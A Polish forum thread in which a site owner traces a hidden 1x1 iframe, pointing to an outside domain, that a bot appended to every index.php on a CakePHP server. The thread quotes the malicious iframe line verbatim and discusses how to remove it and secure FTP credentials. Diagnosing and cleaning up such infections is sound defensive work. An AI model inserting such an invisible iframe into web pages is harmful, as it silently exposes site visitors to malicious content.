Witam
Wczoraj w jakiś nieznany mi sposób w pliki CakePHP znajdujące się na serwerze (moim) wkradł się jakiś rodzaj wirusa (być może to zdanie jest niepoprawne logicznie ale nie to jest najważniejsze w tej sprawie ), który dodaje zaraz po znaczniku </html> taką oto linijke :

[HTML] pobierz, plaintext 
<iframe src="http://thedeadpit.com/?click=1336703" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>
[HTML] pobierz, plaintext 

Powoduje to blokowanie przez niektóre antywirusy(np. AVAST) mojej witryny. Jeśli to coś pomoże, oto adres serwisu : www.hcphotos.pl

Postanowiłem wgrać na serwer nie ruszany folder "cake" jednak problem nie zniknął. Czy ktoś może mi powiedzieć gdzie i czego mam szukać żeby się tego pozbyć? wg. avasta wirus nazywa się "HTML:Iframe-inf".

Pozdrawiam i liczę na pomoc

Albo HTML-Injection, albo ktoś dobrał się do Twojego hasła na FTP. Bardziej prawdopodobna jest pierwsza opcja.

kurcze ale niezabardzo gdzie było przeprowadzić html-injection ;/ tzn na stronie nie ma żadnych formularzy i tym podobnych rzeczy, które wypełniał by użytkownik. Jedyne co przychodzi mi do głowy to to, że przez chwilę panel administracyjny znajdujący się pod adresem /admin/ był niezabezpieczony i może wtedy jakiś bot coś narobił...

ale w takim razie co z tym teraz robić ?

przejrzyj logi, zabezpieczcz pa o ktorym mowiles i usun kod frame'a...

heh no właśnie sęk w tym, że tego niema w plikach widoku to jest dodawane...w jakiś tajemniczy dla mnie sposób. Nie wiem czy przez jakiś plik php czy JS...

może...

auto_prepend_file / auto_append_file?

JS, to nie ta bajka, ~Bajki.

Sprawdź, czy weryfikujesz wszystkie dane pochodzące od usera.

Rozumiem, że takie zmienne(?) pojawiły by się w kontrolerze ?

Hmmm myślałem, że CakePHP robi to sam ale skoro nie...to i tak tam niema czego weryfikować ;/ user poprostu ogląda strone główną, lub koncert, lub album z koncertu. Nigdzie niczego nie wpisuje

Ale zauważyłem, że ta linijka dodawana jest tylko w przypadku istniejących kontrolerów tzn kiedy poda się zły adres to wczytuje się domyślny layout, ale linijka nie jest dodawana. Być może to jest jakiś trop...

Takie boty w celu kompatybilności najczęściej dopisują się do głównego pliku, czyli index.php i to na jego końcu szukałbym tego kodu. Nie ma co kombinować

haha faktycznie bot dopisał do kazdego pliku index.php na serwerze linijke z tym kodem ! kurcze dzięki wielkie za pomoc wszystkim !

Teraz pozostała Ci zmiana hasła do FTP oraz przeskanowanie programem antywirusowym wszystkich komputerów, na których logowałeś się na FTP. Bo skądś bot musiał mieć to hasło...

hmm zarówno login jak i hasło były bardzo łatwe do zgadnięcia więc może to kwestia tego. ale przeskanuje ;P a hasło i login zmienione ;P

dzieki jeszcze raz